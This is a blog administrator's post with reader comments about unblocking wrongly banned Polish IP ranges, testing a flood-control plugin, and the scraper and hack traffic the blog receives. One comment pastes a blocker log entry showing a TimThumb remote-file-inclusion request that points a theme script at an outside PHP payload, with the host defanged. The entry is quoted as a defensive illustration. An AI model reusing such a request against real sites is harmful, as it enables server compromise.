Admin: Poland & Flood Control.

Two Admin Notes:

  • Polish network is now unblocked.
  • I activated flood control software. Tell me if you see pesky captchas.

  • The Polish Network
    Some Poles using “tpnet.pl” got blocked which the author of ZB block gives the reason as “Network turned clean, turned dirty again.”

    He may very well be right. But it’s clear this block has false positives. The visitors were coming from http://doskonaleszare.blox.pl/2012/07/ensembles.html and clearly are people discussing Watts paper (in Polish. Which my brother-in-law and niece speak but I don’t.)

    It seems I need a password to comment there. So, I’ll do second best and mention the issue here.

    To those potential visitors, apologies! I have unblocked the Polish ranges from ZB Block and also unbanned the two IPs whose entire ban was escalated to Cloudflare. (In fact, in case other totally innocent Poles were blocked, I went whole hog and unbanned entire ranges like 123.456.789.0/24.)

    If this leaves a ping at the Polish blog and anyone there knows people who are blocked and wish to read any posts here, convey my apologies to them. Also, have someone not blocked send me their IP and I will unblock that range. If they don’t request unblocking,the IPs will automatically unblock within a week. Apologies for the trouble.

    The Flood control
    Sudden flooding by bots had become very rare, but I experienced an flood last night. A bot that did not declare it’s provenance in robots.txt raced through all the categories at a rate of 10 hits per second. This is precisely the sort of behavior that can crash blogs. (The blog didn’t crash though.) I hunted down a flood control plugin which I’m testing out.

    The flood control software has already presented me with obnoxious captchas when I log into wp-admin. Let me know if it presents obnoxious messages to you. The purpose is not to pester people. If it does, that solution will be deemed unsuitable. (Note: the plugin is supposed to be “tweaked”. So it may be that a tweak will be sufficient to fix. I also implemented another potential remedy that will have no untoward effects on people, but may not work.)

    Meanwhile, carry on discussing Zeke and Watt’s temperatures.

    23 thoughts on “Admin: Poland & Flood Control.”

    1. I thought this post had something to do with extreme weather in Poland!

      I blame fracking.

    2. BillC–
      Heh! I can see why. Maybe a few Poles will stop by and tell us whether there is any flooding in Poland.

    3. I’m curious what the plugin’s obnoxious captchas are like compared to yours.

    4. Brandon–They are using Google’s captchas.

      The obnoxious aspect happened only when I tried to log in. I’m using the default flood settings (which I haven’t inspected!) But when I log in, I always do several things fairly quickly (some of which is.. maybe odd!)

      I enter “http://rankexploits.com/musings/wp-admin” and hit return. This redirects to http://rankexploits.com/musings/wp-login very quickly. So that’s two hits very fast! Then, as soon as I start typing my user name, my mac fills in the passwords, so I click “login”… quickly. Then, the page loads, and I immediately click to navigate. So I am clicking pretty quickly. The flood filter finds this all very suspicious and presents me with captchas.

      I answered… and then also immediately added my IP to the whitelist! (I need to look at the logs to see if I any floods occurred today!)

    5. lucia, if that’s the CAPTCHA system I think it is, I think it should be surprisingly easy to break. Because of the spacing in it, the lines are basically useless. I believe it even use consistent fonts. Heck, I think it’s noiseless and uses binary colors too.

      That means the only meaningful protection it has is distortion. That’s useful but nowhere near sufficient.

    6. Brandon– It might be. I’m going to see if I get any floods. But to make it effective at preventing floods or rapid scrapes, maybe it’s to add a “time out” either before the captcha is displayed or after the captcha is processed. Humans aren’t going to answer it in less than 5 seconds, and that’s at least enough to make the bot slow down. I’m not sure if it would save the blog from crashing but it prevents the bot from scraping 20 pages quickly. Also….. given the pre-existing code, I may be able to read the ban file and ban them at cloudflare. Some thought might be required. For now…. maybe the current generation of scrapers don’t solve it anyway!

    7. I think that you don’t need password to post on ‘doskonaleszare’, unless you want your nick registered.

    8. pdjakow–
      Oh! It looks like I should have scrolled down! I started filling the top boxes which required a password. Not understanding Polish, I allowed my self to be defeated.

    9. I found a second Polish range that was unfairly blocked. (Different hosting company. ) The group unblocked yesterday were at .tpnet.pl. I saw obvious honest to goodness humans coming from chello.pl blocked this morning. Sorry…

      ( I do need to block to keep the blog running. But the defaults are sometimes a bit harsh on certain people who have no choice but to get service with ISPs who do have other customers who send out lots of not so nice connections. My other blocks will still protect against truly bot- operated nasty stuff other customers on those ranges might do.)

    10. I don’t see any captchas but I noticed the July UAH anomaly of 0.28.

      I’ve no idea what my un-idiot-proof guess was – a fair bit higher I think. πŸ™‚

    11. So looking at this backwards, why is this blog attracting so much spam? Something odd is happening AFAEKS

      PS caught a captcha yesterday.

    12. Eli–

      It’s not so much spam as hack attempts. Spam is pretty mild. Someone just wants to put a stupid comment into the comments system.

      I intercept lots and lots of XSS, RFI and other hack attempts daily. Also, the flood control is (probably) for scraping which is a different issue. The flood control did catch something trying to flood the blog. I also caught a different thing trying to flood with a method I devised. The slightly edited catch is

      #: 82698 @: < redacted > Running: 0.4.10a1
      Host: lc3.cae.com
      IP: 142.39.230.100
      Score: 1
      Violation count: 1 INSTA-BANNED
      Why blocked: < redacted > . INSTA-BAN. You have been instantly banned! |-| || ( ax=0) [CA] ; ( 0 )
      Query:
      Referer: < redacted >
      User Agent: < redacted >
      Reconstructed URL: < redacted >

      I’m redacting the reason and information involved that made me know I should ban it to keep my method super secret. πŸ™‚

      But I looked up lc3.cae.com and they have been accused of very fast scraping in the past. See
      http://www.stopforumspam.com/forum/viewtopic.php?id=2705

      The person complaining there wrote

      “The customary 30 IPs attempting to scrape my site in the last 24 hours, including two at 353 pages / sec and 219 pages / sec:

      207.96.208.130 : lc2.cae.com
      142.39.230.100 : lc3.cae.com’

      Looking at the server logs, lc3.cae.com was gearing up to try to load at rates comparable to that! I got it banned at cloudflare within a few seconds. But… wow!!!

      This sort of thing would crash the blog.

      I don’t know why they hit me. But they do.

      By the way, my method of initial detection only worked because the bot was stooooooopid. I need to code to get the flood control plugin to also auto-ban at cloudflare. But

      1) I also to make sure that isn’t catching people.

      That can easily be done by tweaking the settings. I’m the one most likely to be caught– or any other author. Few people will click as fast as we do in wp-admin.
      and
      2) I need to figure out HOW to auto-ban those IPs while also warning them. (I think I might just read the flood control ban file in ZBblock and then tell them they are in it!)

    13. Eli

      PS caught a captcha yesterday.

      Thanks for letting me know. I think I’m going to change the settings to letting people load 2 pages in 2 seconds. The default is 1 per 1 second. These sound similar, but they aren’t quite because I think if you get autoforwarded, you hit the 2nd page in less than a second, But you wouldn’t go on and hit a 3rd. So wiht 2 pages in 2 seconds your ok.

    14. Eli —
      Examples of outright hack attempts include:


      #: 83148 @: Thu, 09 Aug 2012 13:16:36 -0700 Running: 0.4.10a1
      Host: static.223.127.47.78.clients.your-server.de
      IP: 78.47.127.223
      Score: 5
      Violation count: 1 INSTA-BANNED
      Why blocked: ; Suspected hack attempt INSTA-BAN. serve: HTTP Server Detection, usually infected. INSTA-BANNED. You have been instantly banned! |-| (1: //wp- ) Anonymizing or proxy host. INSTA-BAN. (2: -server ) It looks like you are trying to call the theme directly. INSTA-BAN. Fingerprint, scrape or hack behavior. INSTA-BAN. (4: /wp-content/theme ) || ( ax=0) ( Caution: php sniff? -- bypass /themes/ ); [DE] ( 404=1 ) ; ( 0 )
      Query:
      Referer:
      User Agent: Samsung-SPHM540 Polaris/6.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
      Reconstructed URL: http:// rankexploits.com /musings/2011/sorry-bergen-norway//wp-content/themes/Spectrum?src=http:// picasa.c0m.michelle-hall.c0m /andalas.php


      (I’ve changed o’s to 0’s… and broken stuff to get around WP’s turning things into links…

      Everything with src=http: is a hack attempt. You can read about timthump here http://wpmu.org/timthumb-zero-day-vulnerability-affects-hundreds-of-wordpress-themes/ You’ll see the “Spectrum” theme is vulnerabile. I don’t have that at my blog… but that’s something trying to hit it.

      I have been hit by many, many “free penetration testers” . It’ snot just a theory. I know because ZBblock blocked them and then I looked up the URI and referrers. I’ve seen user agents for penetration testing.

      Now… penetration testing is a good thing if I do it on my own site. That way I learn of the vulnearbility and then eliminate it before someone else finds it. But if someone else does it, it’s a way to identify a vulnerability so you can hack in.

      I’m also seeing lots of hack attempts from behind anonymous proxy services.

      I also see some funny things. Some people in various countries in the Arabian Penninsula (and today India) really, really, really want to look at this image:

      The entity– which I am sure is bot like– keeps returning about 10 times a day for a month trying to load that image.

    15. I understand the authors at Scientific American are preparing a series of article attributing the flood to increased atmospheric CO2

    16. By the way, I have organized things so ZBblock now reads the flood control list. The warning states:
      $whyblockout=”

      Flooding or Scraping detected

      Your IP address [$address] appears [$in_flood_control] time in the permanent flood control banlist. It was entered after being detected requesting pages more than once per second and subsequently failing a captcha.

      This rate of requesting pages is not consistent with being a blog reader and looks much more like a nasty scraper bot. My hobby blog cannot tolerate this sort of thing. No way. No how. Scraping makes the whole thing crash then no one can read the blog.

      It is possible your IP got into this list through no fault of your own. If you wish your IP to be removed from that particular ban list, you MUST contact me. If you know my private email, you may send me email using that address. When you contact me, you MUST send me the information in below. If you do not know my private email, click the email link and use my spamgourmet email address. Note: the purpose of the spamgourmet email address is to protect my email address from spammers– many of whom see this error page.

      “;

      I may eventually code to auto-remove the IPs in flood control when I ban at cloudflare…. but for now… no.

    17. El-
      I have no idea what the reason is. I’m on shared hosting. There’s lots of stuff on the server.

      I do know that I had a mega-firestorm or hits from bezeq in Israel when I was sending a letter explaining to them that according to the 9th circuit court in the US, hotlinking is not copyright violations. bezeq was (and still is) rumored to host picscout, which is the image-trolling bot that Getty now owns and supposedly goes around looking for copyright violations. I blogged about their hits– but didn’t mention about the letter exchange that was happening concurrently.

      http://rankexploits.com/musings/2011/bezeqint-net-is-this-an-attack/

      Based on what I see in server logs, I tend to suspect some of the scraping may well be related to the image/copyright bots. There is some pretty obvious attempts to load images — and I’ve done “things” that make it obvious that a bot keeps trying and failing to the same dang images over and over– but from different IPs. Sort of like the one above. It’s pretty to see “things” trying to hit an image with certain types of connections, get banned, come back — always from servers– etc. And these are all perfectly visible images for which I (or Zeke ) own the copyright!

      But I’ve actually got the image scraping down to where — if the image bots would just not do stupid things– they could see the images they want– provided they tread lightly and not try to scrape 1000 images in an hour!

      But other stuff…. no. It’s not image-copyright bots. I think some of it is merely that because the blog ‘pings’ and has a lot of incoming links, stuff finds it’s way here. But some of it… really…. I know there has been penetration testing done. I know because ZBblock interrupted it and the connection pointed to a “penetration testing” site. Their site user agreement makes the user promise not to use it against a site they don’t control– but clearly…. they don’t enforce that. ( They could enforce this by insisting the site owner insert a hidden code field on a page at their site. )

      I banned that and then two more came around!!!!

      I’d bet interested in knowing what RC’s logs look like. I betcha’ that if the guys blogging actually saw their logs they’d see some similar stuff. But they also may be on a dedicated host so their server may have a real firewall that blocks bad things at the router. I’m on shared hosting… so… tough luck for me!

      Cloudflare is helping a lot. I’ve banned a huge number if servers with bad reputations by IP. Oh. And I banned Brazil and China. Those helped a lot. For a time I banned Israel. But now, just Bezequint.

    18. A minor nit lucia:

      But they also may be on a dedicated host so their server may have a real firewall that blocks bad things at the router.

      If you’re using a firewall to block things, you aren’t blocking them at the router. You’re blocking them at the firewall. The firewall is there to stop those things from ever reaching the router.

    19. Brandon… shows what I know! πŸ™‚

      (Note to self: change “at” to before. Then I can make myself look smart and Brandon look mean. Bwah hah hah!!!)

    20. lucia, if it makes you feel better, you can have a single device serve as both a firewall and router. You can even configure a router to work as a gimped firewall. Neither is desirable, but both do happen.

      By the way, I feel I ought to warn you. If you start editing comments to make me look bad, I’ll start posting comments which make it look like you’re editing comments to make me look bad. After a while, nobody will trust you!

      I think I can out evil genius you. Mwah, hah, hah?

    21. Being a bit pedantic, and being a network designer.. Form should follow function. If the firewall is the first box on the end of an ISP link, then it’s usually acting as a router. Especially if the ISP connection’s an Ethernet and you’re not doing anything complex on your network. Companies that sell tin however like to try and convince customers that you need routers and firewalls, and firewalls protecting routers. They sell more tin that way. Then I get paid to try and put it all together, especially when clients want resiliency.

      For simple dedicated hosting, a router may be unecessary and a decent firewall more useful because they can look deeper into the connection requests. Routers are best left to what they’re mostly designed for, being high-speed packet directors and limited to doing basic IP or port blocking. Some can slow waaay down if black/white lists are too long though.

    22. Atomic Hairdryer, of course many routers and firewalls provide some of the functions of the other. I don’t see how that’s relevant though. Was your comment just a random observation (which I have no problem with), or am I missing some connection?

    Comments are closed.